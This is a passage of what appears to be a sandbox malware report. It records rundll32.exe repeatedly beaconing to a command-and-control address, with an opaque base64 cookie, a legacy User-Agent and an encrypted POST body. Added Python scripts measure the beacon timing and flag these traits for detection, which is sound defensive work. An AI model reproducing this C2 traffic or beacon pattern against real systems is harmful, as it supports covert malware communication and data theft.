Aug 15, 2024 05:31:56.466664076 CEST | 80 | 49763 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:31:57.147458076 CEST | 80 | 49763 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:31:57.147491932 CEST | 80 | 49763 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:31:57.147559881 CEST | 49763 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:31:57.147644997 CEST | 49763 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:31:57.147671938 CEST | 49763 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:31:57.152513027 CEST | 80 | 49763 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:03.001056910 CEST | 49764 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:03.006068945 CEST | 80 | 49764 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:03.006161928 CEST | 49764 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:03.006439924 CEST | 49764 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:03.011220932 CEST | 80 | 49764 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:03.708177090 CEST | 80 | 49764 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:03.708194971 CEST | 80 | 49764 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:03.709697962 CEST | 49764 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:03.709697962 CEST | 49764 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:03.714634895 CEST | 80 | 49764 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:09.624260902 CEST | 49765 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:09.629275084 CEST | 80 | 49765 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:09.631849051 CEST | 49765 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:09.635644913 CEST | 49765 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:09.640527964 CEST | 80 | 49765 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:10.347987890 CEST | 80 | 49765 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:10.348098993 CEST | 80 | 49765 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:10.348242044 CEST | 49765 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:10.348429918 CEST | 49765 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:10.353210926 CEST | 80 | 49765 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:12.609469891 CEST | 49766 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:12.614554882 CEST | 80 | 49766 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:12.614625931 CEST | 49766 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:12.614826918 CEST | 49766 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:12.619661093 CEST | 80 | 49766 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:13.419794083 CEST | 80 | 49766 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:13.419852972 CEST | 80 | 49766 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:13.419862032 CEST | 80 | 49766 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:13.419863939 CEST | 49766 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:13.419950962 CEST | 49766 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:13.419950962 CEST | 49766 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:13.419950962 CEST | 49766 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:13.424777985 CEST | 80 | 49766 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:19.983828068 CEST | 49767 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:19.989089012 CEST | 80 | 49767 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:19.989222050 CEST | 49767 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:19.989518881 CEST | 49767 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:19.994400978 CEST | 80 | 49767 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:20.674880981 CEST | 80 | 49767 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:20.674900055 CEST | 80 | 49767 | 72.5.43.29 | 192.168.2.4
Aug 15, 2024 05:32:20.674963951 CEST | 49767 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:20.674963951 CEST | 49767 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:20.675067902 CEST | 49767 | 80 | 192.168.2.4 | 72.5.43.29
Aug 15, 2024 05:32:20.679877996 CEST | 80 | 49767 | 72.5.43.29 | 192.168.2.4
  • 72.5.43.29
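Every connection in the table above goes from rundll32.exe (PID 7568) on 192.168.2.4 to 72.5.43.29:80, and a new one opens every few seconds for the whole three-minute run. The following Python is an added example, not part of the Joe Sandbox report: it takes the first packet of each of the 31 connections from the table and computes the gap distribution, which is what a beacon detector keys on. The thresholds in looks_like_beacon are this example's own assumptions, not figures from the report.

```python
from statistics import mean, median, pstdev
from typing import Dict, List, Tuple

# First client packet of every TCP connection in the table above, as
# (client source port, timestamp). All 31 are 192.168.2.4 -> 72.5.43.29:80
# from PID 7568 (rundll32.exe). Copied from the report, not constructed.
CONNECTION_STARTS: List[Tuple[int, str]] = [
    (49730, "05:29:33.269249916"), (49731, "05:29:34.240308046"),
    (49734, "05:29:40.262680054"), (49739, "05:29:44.107410908"),
    (49740, "05:29:51.919011116"), (49741, "05:29:59.232140064"),
    (49742, "05:30:05.778851032"), (49743, "05:30:10.696465969"),
    (49744, "05:30:17.872545004"), (49746, "05:30:22.325506926"),
    (49747, "05:30:27.342283964"), (49748, "05:30:34.997411013"),
    (49749, "05:30:42.546958923"), (49750, "05:30:47.264909029"),
    (49751, "05:30:53.360039949"), (49752, "05:30:57.655215025"),
    (49753, "05:31:03.686496019"), (49754, "05:31:09.564569950"),
    (49755, "05:31:13.719933033"), (49756, "05:31:18.139801979"),
    (49757, "05:31:23.772468090"), (49758, "05:31:31.533363104"),
    (49759, "05:31:35.733984947"), (49760, "05:31:40.140402079"),
    (49761, "05:31:46.391428947"), (49762, "05:31:52.718504906"),
    (49763, "05:31:56.453417063"), (49764, "05:32:03.001056910"),
    (49765, "05:32:09.624260902"), (49766, "05:32:12.609469891"),
    (49767, "05:32:19.983828068"),
]


def to_seconds(ts: str) -> float:
    """HH:MM:SS.nnnnnnnnn -> seconds since midnight (all on one day, so no date needed)."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def connection_gaps(starts: List[Tuple[int, str]] = CONNECTION_STARTS) -> List[float]:
    """Seconds between consecutive connection attempts."""
    secs = [to_seconds(ts) for _, ts in starts]
    return [later - earlier for earlier, later in zip(secs, secs[1:])]


def beacon_profile(gaps: List[float]) -> Dict[str, float]:
    """Summary statistics; cv (stdev / mean) is the jitter measure."""
    avg = mean(gaps)
    return {
        "connections": len(gaps) + 1,
        "min": min(gaps),
        "median": median(gaps),
        "max": max(gaps),
        "mean": avg,
        "cv": pstdev(gaps) / avg,
    }


def looks_like_beacon(gaps: List[float], min_connections: int = 10, max_cv: float = 0.6) -> bool:
    """One process re-contacting one host:port many times with bounded jitter.
    Thresholds are the example's own choice, not figures from the report."""
    if len(gaps) + 1 < min_connections:
        return False
    return beacon_profile(gaps)["cv"] <= max_cv


if __name__ == "__main__":
    gaps = connection_gaps()
    print({k: round(v, 3) for k, v in beacon_profile(gaps).items()})
    print("beacon:", looks_like_beacon(gaps))
```

On this capture the gaps after the first two back-to-back connections all fall between roughly 3 and 8 seconds with a median near 6 seconds and a coefficient of variation near 0.3: a jittered timer, not a user. Running the same statistic per (process, destination, port) tuple over proxy or flow logs is the cheapest way to surface this kind of traffic when the payload itself is opaque.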
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:29:33.274914026 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:33.979973078 CEST | 153 | IN | HTTP/1.1 200 OK
Date: Thu, 15 Aug 2024 03:29:33 GMT
Content-Length: 32
Content-Type: text/html; charset=ISO-8859-1
Data Raw: af a5 39 e1 ae 05 69 ab b7 56 35 f4 66 c1 a6 e0 78 26 73 32 9b 6e b3 1b e5 a1 a7 e7 9e f5 36 22
Data Ascii: 9iV5fx&s2n6"
Aug 15, 2024 05:29:34.005033016 CEST | 535 | OUT | POST / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Content-Length: 120
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: e4 31 93 8b 9c d0 f6 03 3e bb ef 52 64 c1 a6 e0 7b 26 73 32 9b 6e b3 1b ca a1 a7 e7 8f f5 36 22 5c fb 00 56 f2 3e 8d e0 c3 17 d9 5f dd d0 cb b4 1d a7 cc 3f b9 11 97 de 94 d1 ff 36 27 f0 9c 8f 9c 10 ec 74 6a a4 13 e9 c8 ec c6 61 56 e6 b7 2d b2 fe f8 7b 4b cc 17 0e bf 72 29 50 98 a5 bd 77 17 f3 25 e2 91 1f a5 c7 67 c5 ed fe 1f f0 bb 15 eb 2a be 50 73 b1 6c 66
Data Ascii: 1>Rd{&s2n6"\V>_?6'tjaV-{Kr)Pw%g*Pslf
Aug 15, 2024 05:29:34.220612049 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:34 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:29:34.245693922 CEST | 415 | OUT | POST / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Content-Length: 776
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:34.245729923 CEST | 776 | OUT | Data Raw: d2 37 f8 30 9c d0 f6 03 3e bb ef 52 64 c1 a6 e0 79 26 73 32 9b 6e b3 1b c6 a1 a7 e7 79 f7 36 22 52 82 31 37 a6 66 cc 87 71 62 94 2a dd c0 e5 aa 1a 85 ee 3f b8 11 c8 9a a4 f6 c4 46 52 bd d8 ca f2 3b f4 38 64 a4 5d b0 fc d2 d5 75 5e 87 cc 13 89 f5
Data Ascii: 70>Rdy&s2ny6"R17fqb*?FR;8d]u^BEECt5"PVf/PNA'~1kolX|f6[g\CO&w`,U<Q-Di#OTaDF(|YE0t[keH'Gt?
Aug 15, 2024 05:29:34.934056044 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:34 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>
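The two sessions above show the whole exchange this sample manages with 72.5.43.29: a GET / carrying a 208-character bare base64 token in the Cookie header and a Windows XP era MSIE 6.0 User-Agent, a 32-byte answer declared as text/html whose bytes are mostly non-printable, a POST with an opaque body, and from then on (sessions 2 onward below) the same GET repeated every few seconds against a server that only returns 400 Bad Request, all from rundll32.exe. The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses records in the report's flattened row format, measures the beacon period from the first request of each session, and flags those traits. The SAMPLE text is constructed from sessions 0, 2, 3 and 4 of this page with most headers omitted (the Cookie value is copied verbatim); the thresholds (64-character token, 60 % printable bytes, three 400 responses) and the field names are the example's own choices, not anything the report defines.

```python
"""Beacon triage over Joe Sandbox style HTTP session records. Added example, not the report's
code; SAMPLE is constructed from sessions 0, 2, 3 and 4 of this page in the report's flattened
row format, with most headers omitted and the Cookie value copied verbatim."""
import base64
import re
from datetime import datetime
from statistics import median

COOKIE = "Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK"
SAMPLE = f"""Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.44973072.5.43.29807568C:\\Windows\\System32\\rundll32.exe
Aug 15, 2024 05:29:33.274914026 CEST393OUTGET / HTTP/1.1
Cookie: {COOKIE}
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Aug 15, 2024 05:29:33.979973078 CEST153INHTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Data Raw: af a5 39 e1 ae 05 69 ab b7 56 35 f4 66 c1 a6 e0 78 26 73 32 9b 6e b3 1b e5 a1 a7 e7 9e f5 36 22
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2192.168.2.44973472.5.43.29807568C:\\Windows\\System32\\rundll32.exe
Aug 15, 2024 05:29:40.267796040 CEST393OUTGET / HTTP/1.1
Cookie: {COOKIE}
Aug 15, 2024 05:29:40.952701092 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
3192.168.2.44973972.5.43.29807568C:\\Windows\\System32\\rundll32.exe
Aug 15, 2024 05:29:44.115083933 CEST393OUTGET / HTTP/1.1
Aug 15, 2024 05:29:44.861294031 CEST223INHTTP/1.1 400 Bad Request
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
4192.168.2.44974072.5.43.29807568C:\\Windows\\System32\\rundll32.exe
Aug 15, 2024 05:29:51.927395105 CEST393OUTGET / HTTP/1.1
Aug 15, 2024 05:29:52.612926960 CEST223INHTTP/1.1 400 Bad Request
"""

# A row is "<timestamp> CEST<bytes><OUT|IN><first line>"; the bytes and direction are fused.
ROW_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) CEST"
                    r"(?P<bytes>\d+)(?P<dir>OUT|IN)(?P<data>.*)$")
PROC_RE = re.compile(r"([A-Za-z]:\\\S+)$")  # trailing process path on the fused session row


def parse_sessions(text: str) -> list[dict]:
    """Split the flattened text into sessions: process path plus the messages exchanged."""
    sessions, msg = [], None
    for line in text.splitlines():
        if line.startswith("Session ID"):
            sessions.append({"process": None, "messages": []})
            msg = None
        elif not sessions:
            continue
        elif (m := ROW_RE.match(line)):
            frac = (m["frac"] + "000000")[:6]  # report prints nanoseconds, datetime stops at microseconds
            msg = {"ts": datetime.strptime(f"{m['ts']}.{frac}", "%b %d, %Y %H:%M:%S.%f"),
                   "bytes": int(m["bytes"]), "dir": m["dir"], "first_line": m["data"],
                   "headers": {}, "raw": b""}
            sessions[-1]["messages"].append(msg)
        elif not sessions[-1]["messages"] and (m := PROC_RE.search(line)):
            sessions[-1]["process"] = m.group(1)
        elif msg is not None and line.startswith("Data Raw: "):
            msg["raw"] = bytes.fromhex(line[10:].replace(" ", ""))
        elif msg is not None and ": " in line and not line.startswith("Data Ascii"):
            name, _, value = line.partition(": ")
            msg["headers"][name.lower()] = value
    return sessions


def beacon_intervals(sessions: list[dict]) -> list[float]:
    """Seconds between the first outbound request of consecutive sessions (the beacon period)."""
    starts = sorted(m["ts"] for s in sessions for m in s["messages"][:1] if m["dir"] == "OUT")
    return [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]


def is_bare_base64(value: str) -> bool:
    """Opaque base64 token with no name=value structure, which no browser-set cookie has."""
    if len(value) < 64 or re.match(r"^[\w\-.]+=", value):
        return False
    try:
        base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return False
    return True


def triage(text: str) -> dict:
    """Flags for the traits visible above: rundll32 as HTTP client, bare base64 Cookie, legacy
    MSIE User-Agent, an opaque body declared text/html, and short-period retries answered 400."""
    sessions = parse_sessions(text)
    ivals = beacon_intervals(sessions)
    r = {"processes": sorted({s["process"] for s in sessions if s["process"]}),
         "beacon_count": len(sessions), "median_interval_s": median(ivals) if ivals else None,
         "bare_base64_cookie": False, "legacy_user_agent": False, "binary_body_as_text": False,
         "status_counts": {}}
    for m in [m for s in sessions for m in s["messages"]]:
        h = m["headers"]
        if m["dir"] == "OUT":
            r["bare_base64_cookie"] |= is_bare_base64(h.get("cookie", ""))
            r["legacy_user_agent"] |= "MSIE 6.0" in h.get("user-agent", "")
        elif m["first_line"].startswith("HTTP/"):
            status = m["first_line"].split(" ")[1]
            r["status_counts"][status] = r["status_counts"].get(status, 0) + 1
            if m["raw"] and h.get("content-type", "").startswith("text/"):
                printable = sum(0x20 <= b <= 0x7E for b in m["raw"]) / len(m["raw"])
                r["binary_body_as_text"] |= printable < 0.6  # 12 of 32 bytes printable above
    r["suspicious"] = (any(p.lower().endswith("rundll32.exe") for p in r["processes"])
                       and r["bare_base64_cookie"]
                       and (r["binary_body_as_text"] or r["status_counts"].get("400", 0) >= 3))
    return r


if __name__ == "__main__":
    print(triage(SAMPLE))
```

On the constructed sample the median beacon period comes out at about 7 seconds, which matches the 4 to 8 second spacing of the sessions that follow. None of the traits is conclusive on its own (a bare token in Cookie or an old User-Agent each occur in legitimate software), so the combined flag requires the system binary as HTTP client plus the opaque cookie plus either the binary-as-text body or a run of 400 responses; on a real sensor the same logic would read from the proxy or NetFlow log rather than from a sandbox report.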


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49734 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:29:40.267796040 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:40.952701092 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:40 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:29:44.115083933 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:44.861294031 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:44 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:29:51.927395105 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:52.612926960 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:52 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:29:59.237814903 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:59.983433962 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:59 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:05.784789085 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:06.497452021 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:06 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:11.127800941 CEST | 393 | OUT | GET / HTTP/1.1
